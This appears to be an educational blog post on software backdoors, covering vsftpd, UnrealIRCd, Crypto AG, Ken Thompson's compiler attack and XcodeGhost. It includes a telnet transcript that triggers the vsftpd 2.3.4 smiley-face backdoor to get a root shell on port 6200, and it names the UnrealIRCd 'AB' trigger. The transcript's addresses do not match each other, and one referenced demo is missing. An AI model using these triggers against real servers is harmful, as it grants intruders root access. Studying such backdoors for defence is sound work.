The Art of Backdoors - When :) Gets You In!

Introduction

Computer security is a serious business, but you must smile a little when you see the lengths that some intruders will go to in order to compromise systems. So the addition of the backdoor in the Apple compiler shows the opportunity for large-scale compromises. Organisations such as the NSA have long been accused of applying backdoors into cryptography software, but the Apple hack shows that there's lots of opportunities for others to get in on the act.

Overall there are a number of ways that a backdoor can be added to a piece of software:

• Source code addition backdoor. This is the typical way that an intruder would add a backdoor, and where the additional code is added which will perform a task that allows the source code writer back into the system.  Normally the code is addded by the writer, but then an intruder finds out the backdoor, and can exploit it.
• Injected code backdoor. With this packages such as Metasploit insert some additional code into the application, and which allows it to work the same, but creates a backdoor connection. Normally this is a call-out method, where the program calls-out to the malware writer. 
• Compiler backdoor. This is the best method for going undetected, and where the compiler, itself, adds the additional code to every program which uses the compiler. In terms of mass exploit the compiler backdoor will have the greatest scope as it will exploit a wide range of applications. The executable will also be signed to vertify that it is a valid application.
• Vulnerability and XSS exploit. This involves compromising a system in order to create a backdoor, typically injecting code into a running application which causes the system to open-up a backdoor connection.

The open-up of a network connection will obviously be detected on the system, but code writers have implemented a number of smart ways to cover this up, including passing secret pass phrases for passwords, or with port knocking, where network packets are sent to a well-known open port, which then causes another port to open.

A. Source code additional backdoor

It has long been the case where code writers have added additional code which allows them back into the code whenever they required. They will often add debug functions which can be remotely enabled, but where the forget to switch-off. This backdoor method works well, until the source code is read, and the additional code is revealed. With the rise of Git hub repositories, it can become obvious as to when the backdoor has been added. The following outlines a few backdoors:

 A classic backdoor was added to an FTP server (vsftp), and which has an intentional backdoor within the version running on it. The back door is exploited with the username ending with:

“:)”

and then the server listens on port 6200 and awaits a connection:

root@ubuntu:~# telnet 1.2.3.4 21
Trying 192.168.99.131...
Connected to 10.200.0.1.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user mybackdoor:)
331 Please specify the password.

pass none ^]
telnet> quit
Connection closed.

telnet 1.2.3.4 6200
Trying 10.200.0.1...
Connected to 10.200.0.1.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)

The UnrealRCD IRC daemon runs on port 6667. The version on Metasploitable has a backdoor where the user sends “AB”, and then follows it with a system command on a listening port (see demo above).

Intentional backdoors

Cryptography cracking is often one of the most challenging area for investigators to crack, so there have been many alligations of companies tempering with source code in order to create backdoors. While these are not nescessarly network connections, the software is modified in a way which changes the functionality of the encryption function.

On company, Crypto AG, a Swiss crypotgraphy company who make encryption machines, had been accused of modifying their software in collusion with intelligence agencies from Germany (BND), the UK (GCHQ) and US (NSA). This was highlighted, in 1986, when Ronald Regan announced that the US had intercepted encrypted diplomatic communications between Tripoli and and Libyan embassy in East Berlin, related to a bominding in Berlin. In 1992, the  Iranian government even arrested Hans Buehler, a salesman for the company, but who was released in 1993 without revealing any flaws in the machines (and after $1 million bail money was paid). 

Crypto AG soon after dismissed Hans, and requested he pay back the $1m. Since then Der Spiegel has interviewed former employees and concluded that the machine was in-deed rigged. Even after several other investigations there is still no conclusive proof of the rigging, but some suspect that the relationship with defence agencies goes back to 1954.

B. Injected code backdoor

With this packages such as Metasploit insert some additional code into the application, and which allows it to work the same, but creates a backdoor connection. Normally this is a call-out method, where the program calls-out to the malware writer. The following shows the addition of call-back code into the Putty.exe application:

This method is normally detected by virus scanners as it often adds a standard piece of code which can be detected on a system. When downloading standard programs, it is often important to take the hash signature of the application, in order to determine if it had been modified.

C. Vulnerability and XSS exploit

With a vulnerability exploit, the code writer has allowed the exploit to propagate through the system and cause it to open-up a backdoor. This typically involves a XSS (Cross-site script), where some code is injected into running software and which propagates through the system to open-up a network connection. Adobe Flash is a major contender here for this type of exploit where some shell code is fed through the Flash plug-in and onto the system. There are many examples of where Flash has been compromised, in order to feed the code through, as it is typically running with high levels of trust on the system.

D. Compiler injection backdoor

In 1984, Ken Thompson, inventor of Unix, outlined how he could injected a virus into a compiler. For this he added the code into the code being compiled, and also into the compiler itself, so that the malware could be sustained in future versions of the compiler. He thus knew how to inject the malicious code into the compiler, but not leave a trace in the source code. As it was compiled into the lowest level of the code, it is almost impossible to detect the added code, as the source code shows no sign of the added code. While 1984 was the year of the release of the Apple Mac, it is Apple who are one of the first to be pin-pointed by the methods that Ken outlined in the same year.

Background

A compiler converts high-level code, such as C++ or Pascal, into a machine ready equivalent (machine code). This can either be done to produce a portable executable, such as an EXE in Microsoft Windows. One way to compromise an application is to create a backdoor in the compiler, so that a line of code such as:

Console.WriteLine("Hello")

could be compiled to perform the machine code equivalent of:

Console.WriteLine("Hello")
TcpSocket(9999);

which might open-up a network port (9999) which could be connected to. In this way when the app was uploaded onto a site, it would look as it was a valid compile. It thus means that good applications will be infected in the same way as bad apps, and will be signed by a trusted certificate.

XcodeGhost

WithXcodeGhost the target was Apple iOS, and which replaces Apple's Xcode (which is used to create iOS and Mac OS apps).Unfortunately it is rather large to download (over 3GB), so in countries such as China developers have had to download Xcode from untrusted sources, which had a backdoor added to it. This resulted over 300 back-doored apps being added to the Apple App Store, including WeChat which is a messaging app used by over 600 million people.

The malware itself is able to show phishing pages which are used to steal user credentials, and it does seem surprising that Apple allowed more than three dozen backdoored apps to be hosted on the App Store, including WeChat, Didi Kuaidi (a similar app to Uber for car-hailing), and NetEase Inc (a Spotify-like music app).

Normally a program is produced and then signed with the private key of the developer, which verifies that it has come from a trusted source (a public key then verifies that the code has come from a trusted source and also that it has not been modified - known as code signing with a strong key). So, in the case of XcodeGhost, valid developers will produce signed apps but where the have a backdoor added in the executable program.

Conclusion

So we now see one of the first examples of a compiler backdoor. Overall, Apple has a strict policy on the apps that are allowed on their store, and they check each of them. Unfortunately the checking of these does not go as far as checking for inserting backdoors within the compiler. It has long been known that someone tampering with a compiler can easily add a backdoor, and it seems strange that there was no checking done on this on the Apple App store. Apple has a fairly closed environment for developers and it seems strange that there was no signing of applications for their build from a trusted compile (Xcode).

Backdoors will not go away, and if anything they will increase, as they are the natural way of someone silently compromising a system.